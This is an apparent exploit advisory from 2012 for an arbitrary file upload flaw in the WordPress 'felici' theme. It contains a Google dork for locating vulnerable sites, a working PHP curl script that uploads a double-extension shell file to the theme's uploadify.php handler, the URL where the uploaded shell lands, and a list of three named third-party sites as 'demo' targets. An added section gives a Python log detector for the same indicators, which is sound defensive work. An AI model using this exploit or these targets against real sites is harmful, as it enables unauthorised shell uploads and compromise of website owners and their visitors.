
Wordpress Themes- felici Arbitrary File Upload Vulnerability

Author: Zikou-16 , Published: 30-11-2012
 -------------------------------------------------------------------------------

######################################################################################
#
# Author => Zikou-16
#
# Facebook => http://fb.me/Zikou.se
#
# Google Dork => inurl:"wp-content/themes/felici"
#
#######################################################################################

---------------------------------------------------------------------------------------

Exploit : uploadshell.php.jpg or .gif

<?php

// Local file that will be sent to the theme's upload handler.
$uploadfile = "dz.php.jpg";

// Unauthenticated POST of the file to the theme's uploadify.php endpoint.
$ch = curl_init("http://www.localhost/wp-content/themes/felici/sprites/js/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata' => "@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);

// The handler's response (the stored file name) is echoed back.
print "$postResult";

?>


Shell Access : http://www.localhost/wp-content/themes/felici/sprites/js/cufon-fonts/uploaded/custom_dz.php.jpg

<?php
phpinfo();
?>
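Added example, not part of the original advisory: a small Python detector that scans web-server access log lines for the two indicators described above, a POST to the theme's uploadify.php handler and a request for a double-extension file (custom_*.php.jpg, custom_*.php.gif and the like) under the cufon-fonts/uploaded/ directory. It generalises the advisory's .jpg/.gif case to any .php-style segment that is not the final extension; the log lines, client addresses and the combined log format are constructed assumptions.

```python
import re
from typing import List, Optional, Tuple

# Paths taken from the advisory: the unauthenticated upload handler and the
# directory the uploaded file is stored in (with a "custom_" prefix).
UPLOAD_HANDLER = "/wp-content/themes/felici/sprites/js/uploadify/uploadify.php"
UPLOAD_DIR = "/wp-content/themes/felici/sprites/js/cufon-fonts/uploaded/"

# Assumed Apache/nginx "combined" log layout: client, timestamp, request, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) '
)

# A name such as "custom_dz.php.jpg": a php/php3/phtml segment that is not the
# last extension. Servers using multi-extension handlers may still execute it.
DOUBLE_EXT_RE = re.compile(r'\.(php\d?|phtml)\.[a-z0-9]+$', re.IGNORECASE)

# Constructed sample log lines (documentation IP ranges, not real clients).
SAMPLE_LOG = [
    '203.0.113.5 - - [30/Nov/2012:10:15:01 +0000] "POST /wp-content/themes/felici/sprites/js/uploadify/uploadify.php HTTP/1.1" 200 41 "-" "curl/7.21"',
    '203.0.113.5 - - [30/Nov/2012:10:15:09 +0000] "GET /wp-content/themes/felici/sprites/js/cufon-fonts/uploaded/custom_dz.php.jpg HTTP/1.1" 200 8123 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [30/Nov/2012:10:16:00 +0000] "GET /wp-content/themes/felici/style.css HTTP/1.1" 200 2210 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [30/Nov/2012:10:16:02 +0000] "GET /wp-content/themes/felici/sprites/js/cufon-fonts/uploaded/custom_logo.png HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]


def classify(line: str) -> Optional[Tuple[str, str]]:
    """Return (indicator, path) for a suspicious request, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    method = m.group("method")
    path = m.group("path").split("?", 1)[0]  # ignore any query string
    if method == "POST" and path == UPLOAD_HANDLER:
        return ("upload-to-uploadify", path)
    if path.startswith(UPLOAD_DIR) and DOUBLE_EXT_RE.search(path[len(UPLOAD_DIR):]):
        return ("double-extension-in-upload-dir", path)
    return None


def scan(lines: List[str]) -> List[Tuple[str, str]]:
    """Scan log lines and collect every hit, preserving log order."""
    return [hit for hit in (classify(line) for line in lines) if hit]


if __name__ == "__main__":
    for indicator, path in scan(SAMPLE_LOG):
        print(f"{indicator}: {path}")
```

Pair the POST hit with a filesystem check of the uploaded/ directory for files whose name contains ".php" before the final extension; the presence of such a file is the stronger signal.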


---------------------------------------------------------------------------------------

Demo :

1) http://www.mostakbali.net/wp-content/themes/felici/sprites/js/uploadify/uploadify.php

2) http://www.edufin.com.br/wp-content/themes/felici/sprites/js/uploadify/uploadify.php

3) http://www.readermagazine.net/wp-content/themes/felici/sprites/js/uploadify/uploadify.php

-----------------------------------------------------------------------------------------
